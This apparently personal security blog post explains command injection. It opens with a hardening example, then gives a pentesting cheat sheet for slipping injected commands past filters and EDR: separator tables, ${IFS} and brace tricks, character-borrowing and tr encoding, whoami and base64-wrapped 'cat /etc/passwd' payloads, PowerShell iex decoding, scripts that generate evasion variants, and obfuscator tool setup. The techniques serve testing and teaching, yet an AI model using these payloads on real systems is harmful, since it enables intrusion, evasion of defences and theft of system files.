
Command Obfuscation

If we haven't already learned from the news coverage of the enormous MOVEit data breach: injection flaws can ruin lives. Validate data on the front end, then sanitize and re-validate that same data on the back end. Try not to run server-side commands at all; use the functions built into the language you're writing in instead, and when you really must call a binary, pass user input as an argument, never as part of a string a shell re-parses.
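The sink that makes command injection possible, next to a hardened version of the same lookup. This is an added example, not code from the original post; the function names and the host parameter are assumptions, and echo/printf stand in for ping so it runs anywhere.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): the injection sink that makes
# "just add a ';' and your command" work, next to a hardened version.
# The function names and the 'host' parameter are assumptions for the demo;
# echo/printf stand in for ping so the script runs anywhere.

# VULNERABLE: the user-supplied value is spliced into a string that a shell
# re-parses, so ; | & && || $( ) and backticks all become operators.
lookup_vulnerable() {
  local host="$1"
  sh -c "echo pinging $host"        # imagine: sh -c "ping -c 1 $host"
}

# HARDENED, two layers:
#  1. allowlist: only characters a hostname can contain, no leading '-' so the
#     value can never be read as an option, and a sane length;
#  2. no shell re-parse: hand the value to the binary as ONE argv element,
#     after '--', so nothing in it can be interpreted as syntax.
valid_host() {
  local re='^[A-Za-z0-9]([A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$'
  [[ "$1" =~ $re ]]
}

lookup_hardened() {
  local host="$1"
  if ! valid_host "$host"; then
    echo "rejected: $host" >&2
    return 1
  fi
  printf 'pinging %s\n' "$host"     # imagine: ping -c 1 -- "$host"
}

# Demo (constructed input): the same payload against both sinks.
payload='127.0.0.1;echo INJECTED'
echo "--- vulnerable ---"; lookup_vulnerable "$payload"
echo "--- hardened ---";   lookup_hardened  "$payload" || true
```

The allowlist alone is not the fix; a regex can be wrong. Passing the value as a single argument after `--` is what removes the shell from the picture, and the regex just keeps garbage away from the binary.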


If you're on the pentest side and firewalls, EDRs and other blue-team tools are keeping your commands or scripts from working, try these:


Sometimes just adding a ';' and then the command you want will work; other times you'll need to obfuscate it because there's protection in the way. There are likely to be two types of validation:


Front End: checked at the website level, in the browser. If no new web request goes out when your input is rejected, it's front end validation, and editing the request directly (below) walks right past it.

Back End: checked on the server side. This is the one you actually have to get around, by changing what you send.


Using Burp Suite or ZAP to capture the traffic, send the request to Repeater and play. Sometimes you'll want to add one character at a time, building up the full command, so you can see which characters (if it's blocking characters) are being filtered.


Some Basics:

    Operator      Character   URL-Encoded
    Semicolon     ;           %3b
    New Line      \n          %0a
    Background    &           %26
    Pipe          |           %7c
    AND           &&          %26%26
    OR            ||          %7c%7c
    Sub-Shell     ``          %60%60
    Sub-Shell     $()         %24%28%29

Use the URL-encoded form when the payload travels in a query string or form body: a raw & there is read as a parameter separator by the web server, not as a shell operator.

Spaces:

In addition to the URL-encoded option, on Linux-based runtimes you can use ${IFS} (the shell's internal field separator, which defaults to space, tab and newline) in place of a space, or brace expansion, where the shell puts a space between each comma-separated item: {ls,-la} expands to ls -la.
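A simulated blacklist filter and small encoders for the separators and space substitutes above, as an added example (not code from the original post). The blacklist, the sample payloads and the function names are constructed for the demo, not taken from any real product.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): a simulated blacklist filter and
# small encoders for the separators and space substitutes in the table above.
# The blacklist, the sample payloads and the function names are constructed for
# this demo, not taken from any real product.

BLACKLIST=' ;|&'   # assumption: the back end rejects a literal space, ';', '|' and '&'

# 0 if no blacklisted character appears in the payload, 1 otherwise.
passes_filter() {
  local payload="$1" i
  for (( i = 0; i < ${#BLACKLIST}; i++ )); do
    [[ "$payload" == *"${BLACKLIST:i:1}"* ]] && return 1
  done
  return 0
}

# What the web server does before the value reaches the filter/shell:
# '+' -> space, %XX -> the byte XX. (If the filter runs on the DECODED value,
# the URL-encoded column of the table buys you nothing; the alternatives below do.)
urldecode() {
  local s="${1//+/ }"
  printf '%b' "${s//%/\\x}"
}

# Space substitutes: 'echo a b' -> 'echo${IFS}a${IFS}b'  and  '{echo,a,b}'
ifs_encode() {
  local ifs='${IFS}'
  printf '%s' "${1// /$ifs}"
}
brace_encode() {
  printf '{%s}' "${1// /,}"
}

# Run a (decoded) payload the way the vulnerable back end would, but only if it
# survives the filter.
run_payload() {
  local payload="$1"
  if ! passes_filter "$payload"; then
    echo "BLOCKED: $payload" >&2
    return 1
  fi
  bash -c "$payload" 2>/dev/null
}

# Demo with constructed payloads:
run_payload 'echo hello world'                      || true   # blocked: spaces
run_payload "$(ifs_encode 'echo hello world')"                # hello world
run_payload "$(brace_encode 'echo hello world')"              # hello world
# ';' is blocked, so end the line with %0a and separate arguments with %09 (tab):
run_payload "$(urldecode '127.0.0.1%0aecho%09injected')"      # injected
```

The last payload is the one to remember: the newline ends the "real" command (which fails harmlessly) and the tab is just another IFS character, so nothing in the blacklist ever appears.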


Character Obfuscation:

Linux

Using echo

If you echo PATH, you see something like this.

echo ${PATH}

/usr/local/bin:/usr/bin:/bin:/usr/games

You can then pull out specific characters with ${VAR:offset:length}, giving a starting point (0) and how many characters (1). For example, to get the first forward slash:

echo ${PATH:0:1}

Try using printenv and picking one of the environment variables that might have a character you need to borrow.


Using ASCII Tables

This is a slick trick. We're going to use the tr command with the ASCII table (man ascii). tr takes a set of characters and replaces each one with the character in the same position of a second set. For example, to turn uppercase into lowercase we'd use

echo $(tr '[A-Z]' '[a-z]'<<<'THIS SUCKS')

and "this sucks" is echoed back in lowercase. With that knowledge, what we're going to do is offset the ASCII table by one character.

echo $(tr '!-}' '"-~'<<<'[')

Look at the table in man ascii. The first set is ! through }, decimal 33 through 125. We map those onto the set " through ~, decimal 34 through 126: every character shifts forward by exactly one. So we supply the character that sits one position BEFORE the one we want, in this case [ (91), and tr hands back the next one, \ (92). This is super slick but gets long quickly once you need several characters... unless you wanna automate it ;)
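Automating both character-borrowing tricks, as an added example (not code from the original post). The function names are assumptions, and the PATH/HOME lines fed to the demo are constructed rather than read from a real box.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): automating the two character-
# borrowing tricks above. Function names are assumptions; the env lines used
# in the demo are constructed, not read from a real box.

# 1) Substring of an environment variable.  Reads VAR=value lines on stdin
#    (feed it `printenv`) and prints a ${VAR:offset:1} expression that expands
#    to the wanted character on a bash target.
env_char_expr() {
  local want="$1" line name val before
  local name_re='^[A-Za-z_][A-Za-z0-9_]*$'
  while IFS= read -r line; do
    name="${line%%=*}"; val="${line#*=}"
    [[ "$name" =~ $name_re ]] || continue
    before="${val%%"$want"*}"               # text up to the first occurrence
    [[ "$before" == "$val" ]] && continue   # not in this variable
    printf '${%s:%d:1}\n' "$name" "${#before}"
    return 0
  done
  return 1
}

# 2) The tr shift.  tr maps !..} (33..125) onto "..~ (34..126), so feeding it
#    the character one position BEFORE the target gives the target back.
#    Works for targets " through ~ (34..126); a target of ( is not handled,
#    because its predecessor is the single quote used for quoting here.
tr_shift_expr() {
  local want="$1" code prev
  code=$(( $(printf '%d' "'$want") - 1 ))      # ASCII code of the previous char
  (( code >= 33 && code <= 125 )) || return 1
  printf -v prev "\\$(printf '%03o' "$code")"  # octal escape -> the char itself
  printf "\$(tr '!-}' '\"-~'<<<'%s')\n" "$prev"
}

# Whole strings: one tr expression per character, concatenated.
tr_shift_string() {
  local s="$1" out="" i
  for (( i = 0; i < ${#s}; i++ )); do
    out+="$(tr_shift_expr "${s:i:1}")" || return 1
  done
  printf '%s\n' "$out"
}

# Evaluate an expression the way the target shell would (unquoted, so the
# result is also subject to word splitting and globbing, exactly like there).
resolve_expr() {
  eval "printf '%s' $1"
}

# Demo:
env_char_expr '/' <<<'PATH=/usr/local/bin:/usr/bin:/bin'    # ${PATH:0:1}
env_char_expr ':' <<<'PATH=/usr/local/bin:/usr/bin:/bin'    # ${PATH:14:1}
tr_shift_expr '\'                                           # $(tr '!-}' '"-~'<<<'[')
resolve_expr "$(tr_shift_string '/etc/passwd')"; echo       # /etc/passwd
```

Run `printenv | ./this.sh` style: pipe the target's own printenv output into env_char_expr and every offset it prints is valid on that box. The tr route needs no environment at all, only tr and a shell that understands here-strings.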


Windows:

The same idea works on Windows. Echo a Windows variable (via cmd, not PowerShell):

echo %HOMEPATH%
\Users\Aldern00b

cmd's substring syntax is %VAR:~start,length%. To get the second backslash we start at offset 6 (which lands us here: \Aldern00b) and give a negative length, which means "stop that many characters before the end"; the username Aldern00b is 9 characters, so -9 leaves just the \:

echo %HOMEPATH:~6,-9%

You can do the same thing in PowerShell, a bit easier, because a string can be indexed directly:

$env:HOMEPATH[0]

Try Get-ChildItem Env: and pick an environment variable that has a character you need to borrow.


Command Obfuscation

Linux:

Adding $@ in the middle of commands:

who$@ami

Adding \'s in the middle of commands:

who\am\i

Using tr with mixed case (tr folds it back to lowercase):

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Using the rev command to reverse the characters:

$(rev<<<'imaohw')

Base64 encode

echo -n 'cat /etc/passwd | grep 33' | base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

You can also change it up and use xxd (hex) or some other encoding.



Windows:

Adding carets (cmd's escape character; a ^ in front of an ordinary letter is simply dropped):

who^ami

Using iex (Invoke-Expression) on a reversed string: index the characters from the last one backwards ([-1..-6]) and join them back together:

iex "$('imaohw'[-1..-6] -join '')"

Base64 encode/decode (PowerShell's Unicode encoding is UTF-16LE, the same encoding powershell -EncodedCommand expects):

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"


Both:

Random quotes might get you by, as long as they come in matching pairs: w'h'o'am'i works in bash and in PowerShell. cmd.exe does not treat single quotes specially, so use double quotes there instead (who"am"i).
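Generators for the Linux variants above ($@, backslashes, mixed case plus tr, rev, base64) and the matched-quotes trick, with a harness that proves each variant still does what the plain command does. This is an added example, not code from the original post; the function names and the sample command are assumptions for the demo.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): generators for the Linux
# command-obfuscation variants above ($@, backslashes, mixed case + tr, rev,
# base64, matched quotes) plus a harness that proves each variant still does
# what the plain command does. Function names and the sample command are
# assumptions for this demo.

first_word() { printf '%s' "${1%% *}"; }
rest_of()    { local w; w="$(first_word "$1")"; printf '%s' "${1#"$w"}"; }

# who$@ami : $@ is empty when there are no positional parameters
obf_dollar_at() {
  local w out="" i; w="$(first_word "$1")"
  for (( i = 0; i < ${#w}; i++ )); do
    out+="${w:i:1}"; (( i < ${#w} - 1 )) && out+='$@'
  done
  printf '%s%s' "$out" "$(rest_of "$1")"
}

# who\am\i : a backslash before an ordinary character is dropped by the shell
obf_backslash() {
  local w out="" i; w="$(first_word "$1")"
  for (( i = 0; i < ${#w}; i++ )); do out+="\\${w:i:1}"; done
  printf '%s%s' "$out" "$(rest_of "$1")"
}

# $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") : mixed case, lowercased again by tr
obf_case_tr() {
  local w out="" i c; w="$(first_word "$1")"
  for (( i = 0; i < ${#w}; i++ )); do
    c="${w:i:1}"; (( i % 2 == 0 )) && c="${c^^}"; out+="$c"
  done
  printf '$(tr "[A-Z]" "[a-z]"<<<"%s")%s' "$out" "$(rest_of "$1")"
}

# $(rev<<<'imaohw')
obf_rev() {
  local w out="" i; w="$(first_word "$1")"
  for (( i = ${#w} - 1; i >= 0; i-- )); do out+="${w:i:1}"; done
  printf "\$(rev<<<'%s')%s" "$out" "$(rest_of "$1")"
}

# bash<<<$(base64 -d<<<...) : the whole pipeline, nothing readable on the wire
obf_base64() {
  local b64; b64="$(printf '%s' "$1" | base64 | tr -d '\n')"
  printf 'bash<<<$(base64 -d<<<%s)' "$b64"
}

# w'h'o'a'm'i' : every other character wrapped in a matched pair of quotes
obf_quotes() {
  local w out="" i c; w="$(first_word "$1")"
  for (( i = 0; i < ${#w}; i++ )); do
    c="${w:i:1}"; (( i % 2 == 1 )) && c="'$c'"; out+="$c"
  done
  printf '%s%s' "$out" "$(rest_of "$1")"
}

# Run a variant the way the target would and compare it with the plain command.
check_variant() {
  local plain="$1" variant="$2" want got
  want="$(bash -c "$plain")"; got="$(bash -c "$variant" 2>/dev/null)"
  if [[ "$got" == "$want" ]]; then printf 'OK    %s\n' "$variant"; return 0; fi
  printf 'FAIL  %s\n' "$variant"; return 1
}

# 0 if every variant of the command reproduces the plain command's output.
check_all() {
  local cmd="$1" f ok=0
  for f in obf_dollar_at obf_backslash obf_case_tr obf_rev obf_base64 obf_quotes; do
    check_variant "$cmd" "$("$f" "$cmd")" || ok=1
  done
  return $ok
}

check_all 'echo hello world | tr a-z A-Z'   # sample command, constructed for the demo
```

Only the first word is mangled by most of the generators, which is all you need to slip a command name past a keyword filter; the base64 variant wraps the whole pipeline and is the one to reach for when the filter looks at arguments too.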


Automated Tools

It's cool to know how to do all this but it's easier to use tools:


Bashfuscator (Linux):

git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
python3 setup.py install --user
cd ./bashfuscator/bin/
./bashfuscator -h
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

We can then test it by running the command in bash

bash -c '%command%'

Invoke-DOSfuscation (Windows):

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help

If you want to try the above on a Linux box, you can install PowerShell on Linux (Install PowerShell on Linux - PowerShell | Microsoft Learn). Keep in mind the output is cmd.exe syntax, so the generated commands themselves still need a Windows box to run.


AlderN00b

I.T. Admin    |    Hacking    |    Learning

©2022 by AlderN00b.
